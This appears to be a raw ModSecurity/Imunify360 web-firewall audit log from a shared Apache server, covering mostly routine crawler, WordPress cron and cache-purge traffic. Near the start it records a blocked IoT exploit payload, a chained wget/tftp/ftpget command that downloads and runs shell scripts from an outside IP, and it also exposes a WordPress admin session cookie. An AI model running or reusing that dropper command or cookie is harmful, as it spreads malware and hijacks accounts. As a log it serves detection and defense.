anonymous -p anonymous -p 21 207.167.64.24 tbk1.sh tbk1.sh; sh tbk1.sh; rm -rf tbk.sh tbk1.sh tbk2.sh tbk1.sh||"] [severity "CRITICAL"] [tag "service_im360"] Message: Pattern match ";[\\s\\+]?wget\\shttps?:\\/\\/([^\\s\\+])" at ARGS:mdc. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "82"] [id "77142263"] [msg "IM360 WAF: IOT unauthenticated file upload and RCE||RSV:7.05||RS:0||T:APACHE||MVN:ARGS:mdc||MV:cd /tmp; wget http://207.167.64.24/tbk.sh; chmod 777 tbk.sh; sh tbk.sh; tftp 207.167.64.24 -c get tbk1.sh; chmod 777 tbk1.sh; sh tbk1.sh; tftp -r tbk2.sh -g 207.167.64.24; chmod 777 tbk2.sh; sh tbk2.sh; ftpget -v -u anonymous -p anonymous -P 21 207.167.64.24 tbk1.sh tbk1.sh; sh tbk1.sh; rm -rf tbk.sh tbk1.sh tbk2.sh tbk1.sh||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751264475269719 18921 (- - -) Stopwatch2: 1751264475269719 18921; combined=14417, p1=290, p2=13750, p3=0, p4=0, p5=377, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d91d7211-Z-- --61ee5473-A-- [30/Jun/2025:11:51:15.965162 +0530] aGIs2yw0PB_sNO9OrVxz9QAAAAY 20.171.207.232 47916 192.168.74.40 443 --61ee5473-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/https/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61ee5473-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61ee5473-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/https/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/https/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265862903130 16057 (- - -) Stopwatch2: 1751265862903130 16057; combined=3634, p1=174, p2=3333, p3=0, p4=0, p5=127, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4943c124-Z-- --6282335d-A-- [30/Jun/2025:12:14:23.948972 +0530] aGIyRRXzu7QJr9bpYcGF9wAAADU 103.185.74.40 54161 192.168.74.40 443 --6282335d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --6282335d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6282335d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265861383477 2565939 (- - -) Stopwatch2: 1751265861383477 2565939; combined=3072, p1=108, p2=2815, p3=0, p4=0, p5=149, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6282335d-Z-- --1b442a58-A-- [30/Jun/2025:12:14:24.171261 +0530] aGIySMj9GW9trW84LQvbUgAAACk 20.171.207.232 46354 192.168.74.40 443 --1b442a58-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/images/Rajasthan-Travel-Guides/aainag/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1b442a58-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1b442a58-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265867743255 14351 (- - -) Stopwatch2: 1751265867743255 14351; combined=2960, p1=125, p2=2653, p3=0, p4=0, p5=181, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0e60f11f-Z-- --45a9cb0d-A-- [30/Jun/2025:12:14:27.837493 +0530] aGIySOWS9w5iL40fG-hOrwAAADQ 103.185.74.40 30307 192.168.74.40 443 --45a9cb0d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --45a9cb0d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --45a9cb0d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265864155961 3681907 (- - -) Stopwatch2: 1751265864155961 3681907; combined=2074, p1=124, p2=1801, p3=0, p4=0, p5=149, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --45a9cb0d-Z-- --72a98c55-A-- [30/Jun/2025:12:14:28.963272 +0530] aGIyTMj9GW9trW84LQvbVgAAACk 20.171.207.232 46354 192.168.74.40 443 --72a98c55-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/images/Rajasthan-Travel-Guides/images/hotels-Mount-Abu.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --72a98c55-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --72a98c55-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b0f06904-Z-- --246f7876-A-- [30/Jun/2025:12:35:52.455604 +0530] aGI3UOAHVr5WRvZVfZ4PnwAAABE 101.32.208.70 47486 192.168.74.40 80 --246f7876-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --246f7876-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --246f7876-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751267152449378 6505 (- - -) Stopwatch2: 1751267152449378 6505; combined=3713, p1=111, p2=3308, p3=105, p4=3, p5=186, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --246f7876-Z-- --5249a910-A-- [30/Jun/2025:12:35:53.497940 +0530] aGI3UaaKdORrgXGmAaWrGAAAABg 20.171.207.232 39146 192.168.74.40 443 --5249a910-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/Rajasthan-Travel-Guides/https/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5249a910-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5249a910-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/Rajasthan-Travel-Guides/https/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751267381196525 14756 (- - -) Stopwatch2: 1751267381196525 14756; combined=2872, p1=152, p2=2558, p3=0, p4=0, p5=161, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --09d9e83a-Z-- --12162e50-A-- [30/Jun/2025:12:39:42.123962 +0530] aGI4NT1Xz6pBWehVRQxR7gAAAD8 103.185.74.40 2587 192.168.74.40 443 --12162e50-B-- POST /2024/relite/wp-admin/admin-ajax.php?action=elementor_1_elementor_pro_updater&nonce=230c3aadc8 HTTP/1.1 Host: wpcodex.xyz User-Agent: WordPress/6.8.1; https://wpcodex.xyz/2024/relite Accept: */* Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP Cookie check; wordpress_logged_in_960ef4ad69df7c4138c6955def0d03e6=admin|1752472688|NouczWVVe15makFTa5YMSDr3bMIYKTagoH8CpNdJKxY|0f7f46ddee8a47a3a56bbf58729cd71aa66f0dad49f447e08c2b04e52568c497; wp_lang=en_US; wp-settings-time-1=1751265489; wp-settings-1=libraryContent=browse&editor=html Connection: close Content-Length: 103 Content-Type: application/x-www-form-urlencoded --12162e50-C-- 0%5Bcallback%5D%5B0%5D=ElementorPro%5CCore%5CUpgrade%5CUpgrades&0%5Bcallback%5D%5B1%5D=_on_each_version --12162e50-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin X-Frame-Options: SAMEORIGIN Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --12162e50-H-- Message: Pattern match "(?:edit-theme-plugin-file|update|activate|(?:upload|install-(?:plugin|theme)))" at ARGS:action. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/004_i360_vectors.conf"] [line "41"] [id "77316925"] [msg "IM360 WAF: WordPress theme/plugin activity track||File:||SC:/home/brainsto/public_html/2024/relite/wp-admin/admin-ajax.php||Action:||Theme:||Plugin:||User:brainsto||WPU:admin||RSV:7.05||RS:0||T:APACHE||"] [severity "DEBUG"] [tag "wp_core"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751267381331348 793176 (- - -) Stopwatch2: 1751267381331348 793176; combined=8493, p1=261, p2=7473, p3=302, p4=17, p5=440, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --12162e50-Z-- --76faac79-A-- [30/Jun/2025:12:39:42.368402 +0530] aGI4NmRbNiKFRwZlmyR8XQAAAEI 20.171.207.232 43298 192.168.74.40 443 --76faac79-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/https/https/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --76faac79-F-- HTTP/1.1 200 OK -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751272023551218 7763 (- - -) Stopwatch2: 1751272023551218 7763; combined=4678, p1=116, p2=4311, p3=127, p4=3, p5=120, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --75621955-Z-- --dc810e7a-A-- [30/Jun/2025:13:57:05.547499 +0530] aGJKWUIE2yGYrxR8TRkBGwAAAAA 103.185.74.40 63619 192.168.74.40 443 --dc810e7a-B-- POST /wp-cron.php?doing_wp_cron=1751272025.3577830791473388671875 HTTP/1.1 Host: kondaasservice.com User-Agent: WordPress/6.8.1; https://kondaasservice.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --dc810e7a-C-- --dc810e7a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.0.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --dc810e7a-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751272025.3577830791473388671875& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751272025525470 22265 (- - -) Stopwatch2: 1751272025525470 22265; combined=8982, p1=158, p2=7850, p3=293, p4=6, p5=675, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --dc810e7a-Z-- --b666d611-A-- [30/Jun/2025:13:57:06.908670 +0530] aGJKWgR8oXZVTnNmpqLwLgAAACY 156.228.174.171 20969 192.168.74.40 443 --b666d611-B-- GET /timeclock/wp-login.php HTTP/1.1 Host: wpcodex.xyz Accept-Encoding: identity Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Referer: https://wpcodex.xyz/timeclock Connection: close --b666d611-F-- HTTP/1.1 404 Not Found Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 --b666d611-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273077392413 17554 (- - -) Stopwatch2: 1751273077392413 17554; combined=4404, p1=178, p2=4072, p3=0, p4=0, p5=154, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ee74c03e-Z-- --3b3d8f7d-A-- [30/Jun/2025:14:14:42.423405 +0530] aGJOeTrWg2L-yJPxtymvvAAAACM 103.185.74.40 21742 192.168.74.40 443 --3b3d8f7d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3b3d8f7d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3b3d8f7d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273081228196 1195748 (- - -) Stopwatch2: 1751273081228196 1195748; combined=2149, p1=102, p2=1902, p3=0, p4=0, p5=145, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b3d8f7d-Z-- --a7854e76-A-- [30/Jun/2025:14:14:43.830907 +0530] aGJOe5cPYMuFx-9_wxZhJgAAAAo 57.141.0.12 35078 192.168.74.40 443 --a7854e76-B-- GET /rajasthan-tours-from-Delhi/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/images/testimonials/rajasthan-tours-from-jodhpur/index.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --a7854e76-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a7854e76-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273083813378 17764 (- - -) Stopwatch2: 1751273083813378 17764; combined=4131, p1=275, p2=3707, p3=0, p4=0, p5=149, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a7854e76-Z-- --04ae3409-A-- [30/Jun/2025:14:14:43.912936 +0530] aGJOeoGRhlibaNVt0VzAlQAAABE 103.185.74.40 20121 192.168.74.40 443 --04ae3409-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --04ae3409-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --04ae3409-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273082634964 1278447 (- - -) Stopwatch2: 1751273082634964 1278447; combined=2337, p1=110, p2=2086, p3=0, p4=0, p5=141, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --04ae3409-Z-- --9e1fc66f-A-- [30/Jun/2025:14:14:43.966575 +0530] aGJOe_X1QnLxqFPMEnt-CQAAAAE 57.141.0.16 33526 192.168.74.40 443 --9e1fc66f-B-- GET /rajasthan-tours-from-Bikaner/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/images/testimonials/tempo-traveller-coaches.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --9e1fc66f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9e1fc66f-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --30951d5b-Z-- --ff3be508-A-- [30/Jun/2025:14:24:55.393114 +0530] aGJQ35pB8igonk2uLqcyxwAAABA 162.62.213.187 40070 192.168.74.40 80 --ff3be508-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --ff3be508-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --ff3be508-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751273695387081 6489 (- - -) Stopwatch2: 1751273695387081 6489; combined=3477, p1=119, p2=3170, p3=73, p4=1, p5=113, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ff3be508-Z-- --dc035374-A-- [30/Jun/2025:14:24:56.039689 +0530] aGJQ4GI_MzezRTu-HqyE_AAAABE 20.171.207.232 44986 192.168.74.40 443 --dc035374-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jaipur/images/aainag/aainag/js/aaina/1/images/testimonials/js/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --dc035374-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --dc035374-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jaipur/images/aainag/aainag/js/aaina/1/images/testimonials/js/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751276710356614 53694 (- - -) Stopwatch2: 1751276710356614 53694; combined=3143, p1=165, p2=2781, p3=0, p4=0, p5=196, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a9db8b0d-Z-- --a2cf991d-A-- [30/Jun/2025:15:15:12.020363 +0530] aGJcnvGqF1yXwJaRpriIdwAAAA0 103.185.74.40 51458 192.168.74.40 443 --a2cf991d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a2cf991d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a2cf991d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 